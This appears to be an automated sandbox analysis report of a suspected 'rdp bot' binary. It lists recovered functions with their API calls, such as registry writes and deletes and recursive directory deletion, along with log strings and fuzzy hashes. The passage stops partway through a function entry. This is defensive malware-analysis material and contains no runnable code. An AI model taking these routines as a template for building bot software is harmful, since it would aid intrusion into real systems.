Function 00007FFE1339B820 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true

Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 878cbef4255dd2cc40c8794ab988d36fae64f11de0d4cbe0de4badab2383d5c2
Instruction ID: 93ea845258c5530004f56bfef98031e5e6cbe725bba2efe1d01392374ad0f494
Opcode Fuzzy Hash: 878cbef4255dd2cc40c8794ab988d36fae64f11de0d4cbe0de4badab2383d5c2
Instruction Fuzzy Hash: 90D06783D5D7C54AE3239B309C2562A2F6427B2A11F4A81BFC2DA922B3E94C5404D221

Function 00007FFE13385FD5 Relevance: 72.0, APIs: 24, Strings: 17, Instructions: 298fileCOMMON

Download Yara Rule

APIs

fopen.MSVCRT ref: 00007FFE1338601A
fseek.MSVCRT ref: 00007FFE13386039
_errno.MSVCRT ref: 00007FFE1338604D
_errno.MSVCRT ref: 00007FFE13386068
_errno.MSVCRT ref: 00007FFE13386127

Part of subcall function 00007FFE13382072: fwrite.MSVCRT ref: 00007FFE1338211E
Part of subcall function 00007FFE13382072: fflush.MSVCRT ref: 00007FFE1338212A

_errno.MSVCRT ref: 00007FFE13386142
_errno.MSVCRT ref: 00007FFE1338618F
fclose.MSVCRT ref: 00007FFE13386530

Strings

(path != NULL), xrefs: 00007FFE13386096
[E] (%s) -> fread failed(path=%s,errno=%d), xrefs: 00007FFE13386422
NULL, xrefs: 00007FFE13386599
[E] (%s) -> fseek(SEEK_SET) failed(path=%s,errno=%d), xrefs: 00007FFE13386357
[E] (%s) -> fread undone(path=%s,l=%ld,n=%ld), xrefs: 00007FFE133864E1
[E] (%s) -> ftell failed(path=%s,errno=%d), xrefs: 00007FFE13386241
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FFE133863FB
[I] (%s) -> Done(path=%s,buf_sz=%llu), xrefs: 00007FFE133865AF
mem_alloc, xrefs: 00007FFE133863F4
[E] (%s) -> fseek(SEEK_END) failed(path=%s,errno=%d), xrefs: 00007FFE1338605C
C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FFE1338608F, 00007FFE133860C2, 00007FFE133860F5
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FFE1338656C
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE133860A4, 00007FFE133860D7, 00007FFE1338610A
(((*buf) == NULL) || ((*buf_sz) > 0)), xrefs: 00007FFE133860FC
[E] (%s) -> fopen failed(path=%s,errno=%d), xrefs: 00007FFE13386136
(buf_sz != NULL), xrefs: 00007FFE133860C9
fs_file_read, xrefs: 00007FFE13386055, 00007FFE1338609D, 00007FFE133860D0, 00007FFE13386103, 00007FFE1338612F, 00007FFE1338623A, 00007FFE13386350, 00007FFE1338641B, 00007FFE133864DA, 00007FFE13386565, 00007FFE133865A8

Memory Dump Source

Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true

Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd

Similarity

API ID: _errno$fclosefflushfopenfseekfwrite
String ID: (((*buf) == NULL) || ((*buf_sz) > 0))$(buf_sz != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[E] (%s) -> fopen failed(path=%s,errno=%d)$[E] (%s) -> fread failed(path=%s,errno=%d)$[E] (%s) -> fread undone(path=%s,l=%ld,n=%ld)$[E] (%s) -> fseek(SEEK_END) failed(path=%s,errno=%d)$[E] (%s) -> fseek(SEEK_SET) failed(path=%s,errno=%d)$[E] (%s) -> ftell failed(path=%s,errno=%d)$[I] (%s) -> Done(path=%s,buf_sz=%llu)$fs_file_read$mem_alloc
API String ID: 2897271634-4120527733
Opcode ID: c6ab880d62e322add5670c6688a1b4e102cf9b000f052bf6b1aa43f27ab01892
Instruction ID: dd327043883d80df7fcfd38dd54f957c4c500a7997cc11f1c11e15f1b4cffb87
Opcode Fuzzy Hash: c6ab880d62e322add5670c6688a1b4e102cf9b000f052bf6b1aa43f27ab01892
Instruction Fuzzy Hash: 36D15061A09E078DEA109B17E84077C2752AF707B4F4442F2DA2E77AB5DE7CE985D308

Function 00007FFE13386781 Relevance: 44.0, APIs: 15, Strings: 10, Instructions: 226stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FFE133867A6
RemoveDirectoryA.KERNEL32 ref: 00007FFE133867BE
GetLastError.KERNEL32 ref: 00007FFE133867C8

Part of subcall function 00007FFE13382072: fwrite.MSVCRT ref: 00007FFE1338211E
Part of subcall function 00007FFE13382072: fflush.MSVCRT ref: 00007FFE1338212A

strcpy.MSVCRT ref: 00007FFE13386892
strlen.MSVCRT ref: 00007FFE1338689A
strlen.MSVCRT ref: 00007FFE133868B6
strlen.MSVCRT ref: 00007FFE133868C7
strcpy.MSVCRT ref: 00007FFE133868E1
strlen.MSVCRT ref: 00007FFE133868E9
strlen.MSVCRT ref: 00007FFE1338690B
strlen.MSVCRT ref: 00007FFE1338691F
strcmp.MSVCRT ref: 00007FFE13386961
strcmp.MSVCRT ref: 00007FFE13386974
RemoveDirectoryA.KERNEL32 ref: 00007FFE13386A1D
GetLastError.KERNEL32 ref: 00007FFE13386A2B

Strings

(path != NULL), xrefs: 00007FFE13386803
NULL, xrefs: 00007FFE13386B65
[I] (%s) -> Done(path=%s,recursive=%d), xrefs: 00007FFE13386B7B
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE13386811
[E] (%s) -> Failed(path=%s,recursive=%d,err=%08x), xrefs: 00007FFE13386B18
*, xrefs: 00007FFE133868CC
fs_dir_delete, xrefs: 00007FFE133867DF, 00007FFE1338680A, 00007FFE1338698D, 00007FFE13386A42, 00007FFE13386B11, 00007FFE13386B74
[D] (%s) -> Delete(path_wc=%s,f_path=%s), xrefs: 00007FFE13386994
[E] (%s) -> RemoveDirectoryA failed(path=%s,recursive=%d,gle=%lu), xrefs: 00007FFE133867E6, 00007FFE13386A49
C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FFE133867FC

Memory Dump Source

Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true

Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd

Similarity

API ID: strlen$DirectoryErrorLastRemovestrcmpstrcpy$fflushfwrite
String ID: (path != NULL)$*$C:/Projects/rdp/bot/codebase/fs.c$NULL$[D] (%s) -> Delete(path_wc=%s,f_path=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,recursive=%d,err=%08x)$[E] (%s) -> RemoveDirectoryA failed(path=%s,recursive=%d,gle=%lu)$[I] (%s) -> Done(path=%s,recursive=%d)$fs_dir_delete
API String ID: 2460052984-4087913290
Opcode ID: 8c95aa0a120bfe0af3acf2de9201306ac75f388cf0a95f5f789a8ee04980cbda
Instruction ID: a872602822b9a23838f1bf3de3fdc85fde0f9032a902a4df589dfe0408bc00b8
Opcode Fuzzy Hash: 8c95aa0a120bfe0af3acf2de9201306ac75f388cf0a95f5f789a8ee04980cbda
Instruction Fuzzy Hash: 9CA1D161A0CE838DFA209B17A4403FD6352AFA0374F5442F2D66E76AB5DE3CE485D709

Function 00007FFE1338A2F9 Relevance: 35.2, APIs: 3, Strings: 17, Instructions: 201registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32 ref: 00007FFE1338A333
RegSetValueExA.ADVAPI32 ref: 00007FFE1338A45C
RegCloseKey.ADVAPI32 ref: 00007FFE1338A585

Part of subcall function 00007FFE13382072: fwrite.MSVCRT ref: 00007FFE1338211E
Part of subcall function 00007FFE13382072: fflush.MSVCRT ref: 00007FFE1338212A

Strings

[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu), xrefs: 00007FFE1338A354
P, xrefs: 00007FFE1338A507
registry_set_value, xrefs: 00007FFE1338A34D, 00007FFE1338A3A2, 00007FFE1338A3D2, 00007FFE1338A412, 00007FFE1338A483, 00007FFE1338A59E
NULL, xrefs: 00007FFE1338A4B6, 00007FFE1338A66F, 00007FFE1338A67B
C:/Projects/rdp/bot/codebase/registry.c, xrefs: 00007FFE1338A394, 00007FFE1338A3C4
, xrefs: 00007FFE1338A360
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE1338A3A9, 00007FFE1338A3D9
[I] (%s) -> Done(root=0x%p,key=%s,param=%s), xrefs: 00007FFE1338A5A5
, xrefs: 00007FFE1338A496
, xrefs: 00007FFE1338A371
(key != NULL), xrefs: 00007FFE1338A3CB
P, xrefs: 00007FFE1338A60A
[E] (%s) -> RegSetValueExA failed(root=0x%p,key=%s,param=%s,res=%lu), xrefs: 00007FFE1338A48A
P, xrefs: 00007FFE1338A510
, xrefs: 00007FFE1338A49F
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE1338A419
(root != NULL), xrefs: 00007FFE1338A39B

Memory Dump Source

Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true

Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd

Similarity

API ID: CloseOpenValuefflushfwrite
String ID: $ $ $ $(key != NULL)$(root != NULL)$C:/Projects/rdp/bot/codebase/registry.c$NULL$P$P$P$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[E] (%s) -> RegSetValueExA failed(root=0x%p,key=%s,param=%s,res=%lu)$[I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_set_value
API String ID: 716145365-86941537
Opcode ID: 97fac1c429d324d771e78f96010b11915e5e200a702dc340887177889cfd6832
Instruction ID: 6dcdd5ab62ddb6bc5a2640ac60bbb6432dba2cbfa23cd1c0192561b64c263a96
Opcode Fuzzy Hash: 97fac1c429d324d771e78f96010b11915e5e200a702dc340887177889cfd6832
Instruction Fuzzy Hash: 9A81416190DF4B8DFA209746A44427D7260AF20764F0402F2D97E66FB5EE5DE9C6C309

Function 00007FFE13389F94 Relevance: 35.2, APIs: 3, Strings: 17, Instructions: 192registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32 ref: 00007FFE13389FC9
RegDeleteValueA.ADVAPI32 ref: 00007FFE1338A0CE
RegCloseKey.ADVAPI32 ref: 00007FFE1338A1F7

Part of subcall function 00007FFE13382072: fwrite.MSVCRT ref: 00007FFE1338211E
Part of subcall function 00007FFE13382072: fflush.MSVCRT ref: 00007FFE1338212A

Strings

[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu), xrefs: 00007FFE13389FEA
NULL, xrefs: 00007FFE1338A128, 00007FFE1338A2E1, 00007FFE1338A2ED
P, xrefs: 00007FFE1338A179
C:/Projects/rdp/bot/codebase/registry.c, xrefs: 00007FFE1338A02A, 00007FFE1338A05A
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE1338A03F, 00007FFE1338A06F
[I] (%s) -> Done(root=0x%p,key=%s,param=%s), xrefs: 00007FFE1338A217
, xrefs: 00007FFE1338A108
(key != NULL), xrefs: 00007FFE1338A061
P, xrefs: 00007FFE1338A182
, xrefs: 00007FFE1338A111
, xrefs: 00007FFE13389FF6
[E] (%s) -> RegDeleteValueA failed(root=0x%p,key=%s,param=%s,res=%lu), xrefs: 00007FFE1338A0FC
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE1338A0AF
P, xrefs: 00007FFE1338A27C
, xrefs: 00007FFE1338A007
(root != NULL), xrefs: 00007FFE1338A031
registry_del_value, xrefs: 00007FFE13389FE3, 00007FFE1338A038, 00007FFE1338A068, 00007FFE1338A0A8, 00007FFE1338A0F5, 00007FFE1338A210

Memory Dump Source

Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true

Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd

Similarity

API ID: CloseDeleteOpenValuefflushfwrite
String ID: $ $ $ $(key != NULL)$(root != NULL)$C:/Projects/rdp/bot/codebase/registry.c$NULL$P$P$P$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegDeleteValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_del_value
API String ID: 3240087161-1026589300
Opcode ID: 0df8e2a64b31df24b98beab896623ea6af86e3c5906b977220fd0020807af6b5
Instruction ID: 9dbeec737aef85331ad3adcfb7a4115c1f5ef6d77139a25f74e9619fd93f5c89
Opcode Fuzzy Hash: 0df8e2a64b31df24b98beab896623ea6af86e3c5906b977220fd0020807af6b5
Instruction Fuzzy Hash: A381425090CF4B8DFA70A746A84027C6251AF21764F5402F2D97E76EB1EE1EA9D6830A

Function 00007FFE13385A5E Relevance: 31.7, APIs: 9, Strings: 9, Instructions: 177stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FFE13385A7D
CreateDirectoryA.KERNEL32 ref: 00007FFE13385A9F
GetLastError.KERNEL32 ref: 00007FFE13385AF0
strcpy.MSVCRT ref: 00007FFE13385B41
strlen.MSVCRT ref: 00007FFE13385B49
strlen.MSVCRT ref: 00007FFE13385B65
strlen.MSVCRT ref: 00007FFE13385B76
CreateDirectoryA.KERNEL32 ref: 00007FFE13385BE7
GetLastError.KERNEL32 ref: 00007FFE13385BF1

Strings

(path != NULL), xrefs: 00007FFE13385AC7
NULL, xrefs: 00007FFE13385D17
[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,gle=%lu), xrefs: 00007FFE13385B09
[I] (%s) -> Done(path=%s,recursive=%d), xrefs: 00007FFE13385D2D
[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,ptr=%s,gle=%lu), xrefs: 00007FFE13385BA0
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE13385AD5
[E] (%s) -> Failed(path=%s,recursive=%d,err=%08x), xrefs: 00007FFE13385CC6
fs_dir_create, xrefs: 00007FFE13385ACE, 00007FFE13385B02, 00007FFE13385B99, 00007FFE13385CBF, 00007FFE13385D26
C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FFE13385AC0

Memory Dump Source

Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true

Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd

Similarity

API ID: strlen$CreateDirectoryErrorLast$strcpy
String ID: (path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,gle=%lu)$[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,ptr=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,recursive=%d,err=%08x)$[I] (%s) -> Done(path=%s,recursive=%d)$fs_dir_create
API String ID: 1104438493-1059260517
Opcode ID: 13e1409b821552f30bb7bfb1d4cec5f2c8d46ac37056f7234dd1eb152be83d86
Instruction ID: 4313c623721496b42acf049d96df64f8db6b6a3e53f939429454d0f2fe62f8de
Opcode Fuzzy Hash: 13e1409b821552f30bb7bfb1d4cec5f2c8d46ac37056f7234dd1eb152be83d86
Instruction Fuzzy Hash: 3571A011E0CE47CDFA604B17E4403BD1261AB74764F5402F2C96E77AF9DE2CA8C98709

Function 00007FFE13389170 Relevance: 28.3, APIs: 3, Strings: 13, Instructions: 259registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExA.ADVAPI32 ref: 00007FFE133891FD
RegOpenKeyExA.ADVAPI32 ref: 00007FFE1338933F
RegCloseKey.ADVAPI32 ref: 00007FFE1338957E

Strings

NULL, xrefs: 00007FFE1338963D
[E] (%s) -> RegEnumKeyExA failed(root=0x%p,key=%s,enum_index=%lu,subkey_len=%llu,res=%lu), xrefs: 00007FFE133893BF
[I] (%s) -> Done(root=0x%p,key=%s), xrefs: 00007FFE1338956F
C:/Projects/rdp/bot/codebase/registry.c, xrefs: 00007FFE1338926D, 00007FFE1338929D, 00007FFE133892D0, 00007FFE13389303
registry_enum_key, xrefs: 00007FFE1338923F, 00007FFE1338927B, 00007FFE133892AB, 00007FFE133892DE, 00007FFE13389311, 00007FFE1338935A, 00007FFE133893B8, 00007FFE13389568, 00007FFE13389665
(subkey_len != NULL), xrefs: 00007FFE1338930A
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE13389282, 00007FFE133892B2, 00007FFE133892E5, 00007FFE13389318
(subkey != NULL), xrefs: 00007FFE133892D7
(key != NULL), xrefs: 00007FFE133892A4
[E] (%s) -> RegOpenKeyExA failed(root=0x%p,key=%s,res=%lu), xrefs: 00007FFE13389361
[D] (%s) -> Step(root=0x%p,key=%s,enum_index=%lu,subkey=%s,subkey_len=%llu), xrefs: 00007FFE1338966C
(root != NULL), xrefs: 00007FFE13389274
[E] (%s) -> Failed(root=0x%p,key=%s,err=%08x), xrefs: 00007FFE13389246

Memory Dump Source

Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true

Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd

Similarity

API ID: CloseEnumOpen
String ID: (key != NULL)$(root != NULL)$(subkey != NULL)$(subkey_len != NULL)$C:/Projects/rdp/bot/codebase/registry.c$NULL$[D] (%s) -> Step(root=0x%p,key=%s,enum_index=%lu,subkey=%s,subkey_len=%llu)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,err=%08x)$[E] (%s) -> RegEnumKeyExA failed(root=0x%p,key=%s,enum_index=%lu,subkey_len=%llu,res=%lu)$[E] (%s) -> RegOpenKeyExA failed(root=0x%p,key=%s,res=%lu)$[I] (%s) -> Done(root=0x%p,key=%s)$registry_enum_key
API String ID: 1332880857-2775769510
Opcode ID: 72b2d43fdba270805fa9ce16a4e38d3f9eee1f7342bd0eed841d7fb7506766b3
Instruction ID: eedeb16c940bef076215d32d4ec7f4294340d23eb6c01f560710e0fd7d64dbf0
Opcode Fuzzy Hash: 72b2d43fdba270805fa9ce16a4e38d3f9eee1f7342bd0eed841d7fb7506766b3
Instruction Fuzzy Hash: C7B16D6290CD46CEF6608B46E44037C2252ABA4374F5603F2D96E67EB4CE3DE9C68709

Function 00007FFE13385309 Relevance: 26.4, APIs: 2, Strings: 13, Instructions: 123COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32 ref: 00007FFE1338532A
GetLastError.KERNEL32 ref: 00007FFE1338540A

Strings

(path != NULL), xrefs: 00007FFE133853A7
(attr != NULL), xrefs: 00007FFE133853E0
~, xrefs: 00007FFE1338548E
NULL, xrefs: 00007FFE1338553A
P, xrefs: 00007FFE13385493
C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FFE133853A0, 00007FFE133853D9
[E] (%s) -> GetFileAttributesA failed(path=%s,gle=%lu), xrefs: 00007FFE1338541F
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FFE1338537E
[D] (%s) -> Done(path=%s,attr=%08lx), xrefs: 00007FFE13385553
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE133853B5, 00007FFE133853EE
fs_attr_get, xrefs: 00007FFE13385377, 00007FFE133853AE, 00007FFE133853E7, 00007FFE13385418, 00007FFE1338554C
c, xrefs: 00007FFE133853D1
, xrefs: 00007FFE1338542B

Memory Dump Source

Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true

Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd

Similarity

API ID: AttributesErrorFileLast
String ID: $(attr != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$P$[D] (%s) -> Done(path=%s,attr=%08lx)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> GetFileAttributesA failed(path=%s,gle=%lu)$c$fs_attr_get$~
API String ID: 1799206407-3397184676
Opcode ID: 5cb7c68916377c18952a3f6c392acdb44dab1268577e48e40afc6e5c61ff4aeb
Instruction ID: 4513d1a61626a37855d7a48f0ffa283132f1231eb63022a970fb4ec8502aa44c
Opcode Fuzzy Hash: 5cb7c68916377c18952a3f6c392acdb44dab1268577e48e40afc6e5c61ff4aeb
Instruction Fuzzy Hash: EE51D961D0CE17CDFA205B07A4403BC22516B317B5F5403F6C93F669F9AEADA6C58309

Function 00007FFE13381312 Relevance: 25.7, APIs: 7, Strings: 10, Instructions: 241memorystringCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00007FFE1338135D
HeapFree.KERNEL32 ref: 00007FFE1338136E

Part of subcall function 00007FFE13385FD5: fopen.MSVCRT ref: 00007FFE1338601A
Part of subcall function 00007FFE13385FD5: fseek.MSVCRT ref: 00007FFE13386039
Part of subcall function 00007FFE13385FD5: _errno.MSVCRT ref: 00007FFE1338604D
Part of subcall function 00007FFE13385FD5: _errno.MSVCRT ref: 00007FFE13386068

GetProcessHeap.KERNEL32 ref: 00007FFE1338149A
HeapAlloc.KERNEL32 ref: 00007FFE133814AB
strncpy.MSVCRT ref: 00007FFE133815EC
strncpy.MSVCRT ref: 00007FFE13381603
strncpy.MSVCRT ref: 00007FFE13381662

Part of subcall function 00007FFE13382072: fwrite.MSVCRT ref: 00007FFE1338211E
Part of subcall function 00007FFE13382072: fflush.MSVCRT ref: 00007FFE1338212A

Strings

ini_load, xrefs: 00007FFE1338139F, 00007FFE133813DB, 00007FFE133816C1
5, xrefs: 00007FFE133813C5
[I] (%s) -> Done(path=%s), xrefs: 00007FFE133816C8
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FFE133814FA
NULL, xrefs: 00007FFE133816B2
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FFE133813A6
C:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FFE133813CD
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE133813E2
(path != NULL), xrefs: 00007FFE133813D4
mem_alloc, xrefs: 00007FFE133814F3

Memory Dump Source

Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true

Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd

Similarity

API ID: Heap$strncpy$Process_errno$AllocFreefflushfopenfseekfwrite
String ID: (path != NULL)$5$C:/Projects/rdp/bot/codebase/ini.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(path=%s)$ini_load$mem_alloc
API String ID: 1423203057-2746879330
Opcode ID: 76fbbf14fbc657a8e3d58a840b4199e37f4541f4b95c2e21979a01deef1518ed
Instruction ID: 89ec0c7ff581412f52a1aec3aec5dd6b71231fe0d6ee09aa02256abe8611dfe2
Opcode Fuzzy Hash: 76fbbf14fbc657a8e3d58a840b4199e37f4541f4b95c2e21979a01deef1518ed
Instruction Fuzzy Hash: 3FA11562E0DE8289EB108B07E4407BD6761EB607A4F4842F1DD6D67BA5DE7CE5C5C308

Function 00007FFE13388176 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 154COMMON

Download Yara Rule

APIs

ExpandEnvironmentStringsA.KERNEL32 ref: 00007FFE133881AA

Part of subcall function 00007FFE13382072: fwrite.MSVCRT ref: 00007FFE1338211E
Part of subcall function 00007FFE13382072: fflush.MSVCRT ref: 00007FFE1338212A

GetLastError.KERNEL32 ref: 00007FFE13388309

Strings

(path != NULL), xrefs: 00007FFE1338820A
[E] (%s) -> ExpandEnvironmentStringsA buffer is too small(path=%s,res=%lu,xpath_sz=%llu), xrefs: 00007FFE133883EB
